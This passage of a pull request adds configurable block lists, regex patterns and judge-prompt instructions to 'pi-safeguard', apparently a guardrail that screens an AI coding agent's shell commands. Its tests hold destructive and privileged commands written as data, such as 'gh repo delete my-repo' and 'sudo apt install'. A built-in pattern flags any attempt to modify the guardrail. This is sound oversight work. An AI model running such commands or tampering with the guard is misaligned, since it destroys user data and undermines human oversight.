+			expect(r).toContain("kubectl");
+		});
+		it("flags user-configured subcommand prefix", () => {
+			const r = classifyBashCommand("gh repo delete my-repo", [["gh", "repo", "delete"]]);
+			expect(r).toContain("gh repo delete");
+		});
+		it("built-in patterns take precedence over user commands", () => {
+			// sudo is caught by built-in before user matchers run
+			const r = classifyBashCommand("sudo apt install", ["sudo"]);
+			expect(r).toContain("sudo: superuser command");
+		});
+		it("does not flag unmatched user command", () => {
+			const r = classifyBashCommand("echo hello", ["kubectl"]);
+			expect(r).toBeUndefined();
 		});
 	});
 


### PR DESCRIPTION
## Summary

Add user-configurable matching rules and project-level configuration to pi-safeguard.

### New config fields (global + project)
- **`commands`**: Command names to flag. Flat string flags any invocation; array matches a subcommand prefix (`["gh", "repo", "delete"]`).
- **`patterns`**: Regex patterns matched against raw text of all tool input.
- **`instructions`**: Natural language appended to the judge system prompt (labeled by source).

### Config hierarchy
| Scope | Path | Can weaken defaults? |
|-------|------|---------------------|
| Built-in | Package source | — |
| Global | `~/.pi/agent/extensions/pi-safeguard.json` | Yes |
| Project | `.pi/extensions/pi-safeguard.json` | No (additive only) |
| Session | `/guard` directives | Yes (ephemeral) |

### Example config
```jsonc
// ~/.pi/agent/extensions/pi-safeguard.json
{
  "commands": ["kubectl", ["gh", "repo", "delete"], ["terraform", "destroy"]],
  "patterns": ["\\bstaging-credentials\\b"],
  "instructions": "I work with Docker daily. Routine commands are safe. Flag --privileged."
}
```

### Other changes
- Add `\bsafeguard\b` to built-in string patterns (flags attempts to reference/modify the guardrail)
- `buildSystemPrompt()` assembles base prompt + global instructions + project instructions
- `callJudge()` now receives the assembled system prompt instead of importing a constant

### Tests
- 209 tests pass (new: config schema validation, command matching, pattern matching, system prompt assembly)
